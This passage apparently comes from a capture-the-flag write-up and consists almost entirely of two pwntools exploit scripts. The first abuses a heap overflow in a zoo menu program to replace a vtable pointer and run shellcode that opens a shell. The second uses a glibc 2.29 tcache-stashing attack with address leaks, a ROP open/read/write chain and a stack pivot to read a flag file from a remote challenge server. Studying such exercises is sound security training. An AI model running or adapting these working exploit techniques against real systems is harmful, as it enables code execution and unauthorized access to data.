libc = ELF('/libc-2.23.so')
# Needed so asm()/shellcraft below assemble for x86-64 Linux.
context(os='linux', arch='amd64')
def add_dog(name,weight):
    """Menu choice 1: add a dog with the given name and weight."""
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Name : ')
    r.sendline(name)
    r.recvuntil('Weight : ')
    r.sendline(str(weight))
def add_cat(name,weight):
    """Menu choice 2: add a cat with the given name and weight."""
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Name : ')
    r.sendline(name)
    r.recvuntil('Weight : ')
    r.sendline(str(weight))
def listen(index):
    """Menu choice 3: invoke the 'listen' action on animal *index*."""
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('index of animal : ')
    r.sendline(str(index))
def show(index):
    """Menu choice 4: display animal *index*."""
    r.recvuntil('Your choice :')
    r.sendline('4')
    r.recvuntil('index of animal : ')
    r.sendline(str(index))
def remove(index):
    """Menu choice 5: delete animal *index*."""
    r.recvuntil('Your choice :')
    r.sendline('5')
    r.recvuntil('index of animal : ')
    r.sendline(str(index))
# Fixed address the zoo name is assumed to live at (a non-PIE data address;
# confirm against the binary).
name = 0x605420
r.recvuntil('Name of Your zoo :')
# The zoo name is the shellcode followed by the qword `name`.
shellcode = asm(shellcraft.sh())
r.sendline(shellcode+p64(name))
add_dog('fuck',0)
add_dog('fuck',1)
remove(0)
# 0x48 filler bytes then name+len(shellcode).  Per the note above, the name
# overruns into the freed animal object and replaces its vtable pointer with
# the spot where p64(name) was stored — presumably a one-entry table whose
# single pointer is the shellcode.
add_dog('a'*0x48+p64(name+len(shellcode)),2)
# The virtual call on index 0 then goes through the replaced pointer.
listen(0)
r.interactive()
glibc 2.29 - tcache stashing unlink
from pwn import *
r = remote('node3.buuoj.cn',25679)
#r = process('./RedPacket_SoEasyPwn1')
# Every libc offset used later (0x1e4ca0 and the gadget offsets) is tied to
# this libc-2.29 build; the object itself is only referenced from the
# commented-out lines in the ROP chain.
libc = ELF('./libc-2.29.so')
#context.log_level = 'debug'
def add(index,size,content):
    """Menu option 1: allocate slot *index*.

    *size* is a menu choice rather than a byte count (original note:
    1 -> 0x10, 2 -> 0xf0, 3 -> 0x300, 4 -> 0x400).  *content* is sent raw,
    without a trailing newline.
    """
    r.recvuntil('input:')
    r.sendline('1')
    r.recvuntil('idx:')
    r.sendline(str(index))
    r.recvuntil('):')
    r.sendline(str(size))
    r.recvuntil('content:')
    r.send(content)
def free(index):
    """Menu option 2: release slot *index*."""
    r.recvuntil('input:')
    r.sendline('2')
    r.recvuntil(':')
    r.sendline(str(index))
def edit(index,content):
    """Menu option 3: overwrite slot *index* with *content* (sent raw, no newline)."""
    r.recvuntil('input:')
    r.sendline('3')
    r.recvuntil('idx:')
    r.sendline(str(index))
    r.recvuntil('content:')
    r.send(content)
def show(index):
    """Menu option 4: print slot *index*."""
    r.recvuntil('input:')
    r.sendline('4')
    r.recvuntil('idx:')
    r.sendline(str(index))
def gift(fuck):
    """Hidden menu option 666: send *fuck* as the line that follows it."""
    r.recvuntil('input:')
    r.sendline('666')
    r.sendline(fuck)
# Indentation below is reconstructed: the original listing has none.
# --- heap-address leak ---
# Six allocations of size choice 2 (0xf0) into slot 0; free it and display it.
# The printed value is read as a heap pointer and 0x1670 is this layout's
# distance from the heap base.
for i in range(6):
    add(0,2,'fuck')
free(0)
show(0)
r.recvuntil(' ')
leak = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))
heap_base = leak-0x1670
log.success(hex(heap_base))
# --- libc leak ---
# Seven size-choice-4 (0x400) slots freed in turn, two re-taken, slot 0
# freed again and shown; 0x1e4ca0 is main_arena's offset in this libc-2.29
# build.  Neither leak is validated.
for i in range(7):
    add(i,4,'wdnmd')
for i in range(7):
    free(i)
add(0,4,'wdnmd')
add(1,4,'wdnmd')
free(0)
show(0)
r.recvuntil(' ')
leak = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))
libc_base = leak-0x1e4ca0
log.success(hex(libc_base))
# Layout for the tcache-stashing step named in the note above; the exact
# order of size choices and slots is load-bearing.
add(2,3,'wdnmd')
add(4,4,'wdnmd')
add(5,4,'wdnmd')
free(4)
add(6,3,'wdnmd')
add(7,4,'wdnmd')
# Gadget offsets, hard-coded for libc-2.29.
p_rdi = libc_base + 0x26542
p_rsi = libc_base + 0x26f9e
p_rdx = libc_base + 0x12bda6
p_rax = libc_base + 0x47cf8
syscall = libc_base + 0xcf6c5
leave_ret = libc_base + 0x0000000000058373
# ROP chain of raw syscalls (x86-64 numbers: 2 = open, 0 = read, 1 = write):
# open the path at heap_base+0x37f0, read 0x70 bytes from fd 3 into that
# same buffer, write them to stdout.  The leading qword is skipped by the
# pivot below (presumably the rbp slot consumed by leave).
#open
payload = p64(0)
payload += p64(p_rdi)+p64(heap_base+0x37f0)
payload += p64(p_rsi)+p64(0)
payload += p64(p_rdx)+p64(0)
payload += p64(p_rax)+p64(2)
payload += p64(syscall)
#payload += p64(libc.sym['open'])
#read
payload += p64(p_rdi)+p64(3)
payload += p64(p_rsi)+p64(heap_base+0x37f0)
payload += p64(p_rdx)+p64(0x70)
payload += p64(p_rax)+p64(0)
payload += p64(syscall)
#payload += p64(libc.sym['read'])
#write
payload += p64(p_rdi)+p64(1)
payload += p64(p_rsi)+p64(heap_base+0x37f0)
payload += p64(p_rdx)+p64(0x70)
payload += p64(p_rax)+p64(1)
payload += p64(syscall)
# Pad to the 0x300 slot size, then append a chunk-header-shaped qword pair
# (0, 0x101) and two heap pointers; slot 4 is the chunk being edited.
payload = payload.ljust(0x300,'\x00')
edit(4,payload+p64(0)+p64(0x101)+p64(heap_base+0x37e0)+p64(heap_base+0xa50))
# Slot 8 (size choice 2) holds the filename; it presumably lands at
# heap_base+0x37f0, the path the chain opens — confirm.
add(8,2,'./flag.txt'+'\x00'*6)
# Hidden option 666 (cf. gift()): 0x80 filler, a heap address as the saved
# rbp, then leave;ret — moves the stack pointer onto the heap, presumably to
# where the chain above now sits.
payload = 'a'*0x80+p64(heap_base+0x3d00)+p64(leave_ret)
r.sendline('666')
sleep(0.1)
r.sendline(payload)
log.success(hex(heap_base+0x3d00))
r.interactive()
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-ND 4.0)进行许可。
This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (CC BY-NC-ND 4.0).